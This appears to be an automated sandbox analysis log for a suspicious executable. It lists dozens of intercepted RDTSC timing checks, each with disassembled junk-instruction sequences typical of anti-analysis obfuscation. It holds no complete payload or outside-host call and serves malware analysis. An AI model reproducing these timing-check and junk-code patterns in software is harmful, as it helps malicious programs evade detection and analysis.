Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1851CBD second address: 1851CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1851E3E second address: 1851E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1851E44 second address: 1851E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185210F second address: 1852114 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185259F second address: 18525A9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7B98E54826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18525A9 second address: 18525C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7B99161525h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18525C4 second address: 18525EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54836h 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18525EF second address: 18525F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1852710 second address: 1852718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1852718 second address: 185271E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1856F5E second address: 1856F6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F7B98E54826h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1856F6E second address: 1856FAA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jo 00007F7B99161516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007F7B99161521h 0x00000012 pushad 0x00000013 popad 0x00000014 pop ebx 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007F7B99161526h 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1855E01 second address: 1855E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7B98E54826h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1855E0B second address: 1855E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1855E0F second address: 1855E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F7B98E54832h 0x0000000c jbe 00007F7B98E54826h 0x00000012 jo 00007F7B98E54826h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18240A2 second address: 18240A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18240A7 second address: 18240BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B98E54830h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18241BD second address: 18241D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B9916151Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18241D5 second address: 18241D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18241D9 second address: 1824201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 adc di, B364h 0x0000000d push 242A4C86h 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 jmp 00007F7B99161522h 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 182430D second address: 1824311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18244BA second address: 18244BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18244BE second address: 18244C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1824A5B second address: 1824A77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B99161528h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1824E4F second address: 1824E84 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7B98E54826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F7B98E5482Eh 0x00000010 pop eax 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F7B98E54837h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1824E84 second address: 1824E8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1824E8A second address: 1824E8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18560E7 second address: 18560EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18560EB second address: 18560F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1856245 second address: 185624F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7B99161516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185624F second address: 1856280 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7B98E5482Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7B98E54835h 0x00000011 jns 00007F7B98E5482Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1856280 second address: 185629A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7B9916151Fh 0x00000008 jno 00007F7B99161516h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1856856 second address: 1856871 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54834h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1856B04 second address: 1856B20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B99161526h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185D5C8 second address: 185D5CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185D5CC second address: 185D5F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 jmp 00007F7B99161527h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185D5F3 second address: 185D604 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7B98E5482Ch 0x00000008 ja 00007F7B98E54826h 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185C0EB second address: 185C0F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185C0F4 second address: 185C0FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185C21E second address: 185C224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185C36B second address: 185C36F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185C508 second address: 185C529 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7B9916151Dh 0x00000008 jmp 00007F7B9916151Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185C984 second address: 185C988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185C988 second address: 185C9A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 js 00007F7B99161516h 0x0000000f jne 00007F7B99161516h 0x00000015 popad 0x00000016 pushad 0x00000017 push edx 0x00000018 pop edx 0x00000019 jc 00007F7B99161516h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185C9A9 second address: 185C9DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F7B98E5482Dh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F7B98E54835h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185C9DD second address: 185C9E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185C9E1 second address: 185C9E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185D03B second address: 185D041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185D48D second address: 185D4B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007F7B98E54837h 0x0000000d pop edx 0x0000000e pop esi 0x0000000f push ebx 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185BE0A second address: 185BE10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1860E13 second address: 1860E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1860E1A second address: 1860E25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1864A2C second address: 1864A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1868F6B second address: 1868F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1868F75 second address: 1868F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7B98E54826h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1868F86 second address: 1868F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1868F8A second address: 1868F90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1868F90 second address: 1868F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F7B99161516h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1869F7F second address: 1869F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B98E54835h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 17E91E3 second address: 17E91EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 186CD50 second address: 186CD55 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 186CD55 second address: 186CD5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 186CEC8 second address: 186CECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 186CECE second address: 186CED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 186CED4 second address: 186CED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 186D02C second address: 186D047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B99161527h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 19F53A6 second address: 19F53B9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7B98E5482Eh 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0008 second address: 6DD000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD000C second address: 6DD0012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0012 second address: 6DD0018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0018 second address: 6DD001C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD001C second address: 6DD0020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0020 second address: 6DD0044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7B98E54839h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0044 second address: 6DD00E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7B99161527h 0x00000009 adc esi, 79497D6Eh 0x0000000f jmp 00007F7B99161529h 0x00000014 popfd 0x00000015 mov ebx, ecx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c jmp 00007F7B99161523h 0x00000021 pushfd 0x00000022 jmp 00007F7B99161528h 0x00000027 add ecx, 37DDF348h 0x0000002d jmp 00007F7B9916151Bh 0x00000032 popfd 0x00000033 popad 0x00000034 xchg eax, ebp 0x00000035 pushad 0x00000036 movzx ecx, bx 0x00000039 mov bh, 4Ah 0x0000003b popad 0x0000003c mov ebp, esp 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F7B99161522h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD00E5 second address: 6DD00EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD00EB second address: 6DD0135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B9916151Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f jmp 00007F7B99161520h 0x00000014 sub esp, 18h 0x00000017 jmp 00007F7B99161520h 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F7B9916151Ah 0x00000026 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0135 second address: 6DD0139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0139 second address: 6DD013F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD013F second address: 6DD0191 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E5482Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7B98E5482Bh 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F7B98E5482Bh 0x00000019 and eax, 0ACB0B0Eh 0x0000001f jmp 00007F7B98E54839h 0x00000024 popfd 0x00000025 movzx esi, di 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0191 second address: 6DD0197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0197 second address: 6DD019B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD019B second address: 6DD01E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F7B9916151Dh 0x00000014 sbb ax, 9DF6h 0x00000019 jmp 00007F7B99161521h 0x0000001e popfd 0x0000001f call 00007F7B99161520h 0x00000024 pop ecx 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD01E0 second address: 6DD01F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, D1A9h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov al, dh 0x00000010 mov eax, 57477719h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD01F6 second address: 6DD0278 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 69DCD178h 0x00000008 jmp 00007F7B99161521h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007F7B99161521h 0x00000016 xchg eax, esi 0x00000017 pushad 0x00000018 mov bx, ax 0x0000001b pushfd 0x0000001c jmp 00007F7B99161528h 0x00000021 and si, B638h 0x00000026 jmp 00007F7B9916151Bh 0x0000002b popfd 0x0000002c popad 0x0000002d mov esi, dword ptr [762C06ECh] 0x00000033 pushad 0x00000034 mov cl, B8h 0x00000036 push edi 0x00000037 push eax 0x00000038 pop ebx 0x00000039 pop eax 0x0000003a popad 0x0000003b test esi, esi 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F7B99161522h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0278 second address: 6DD02AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F7B98E5574Fh 0x00000010 pushad 0x00000011 mov bl, 0Dh 0x00000013 mov edi, ecx 0x00000015 popad 0x00000016 xchg eax, edi 0x00000017 jmp 00007F7B98E5482Ah 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F7B98E5482Eh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD03CA second address: 6DD03E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B99161522h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov bh, 7Eh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD03E9 second address: 6DD040E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54835h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov dh, CBh 0x00000010 mov cx, 170Bh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD04B9 second address: 6DD04F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B9916151Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a sub eax, eax 0x0000000c jmp 00007F7B9916151Fh 0x00000011 mov dword ptr [esi], edi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 call 00007F7B9916151Bh 0x0000001b pop esi 0x0000001c mov edx, 46D2F43Ch 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD04F1 second address: 6DD04F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
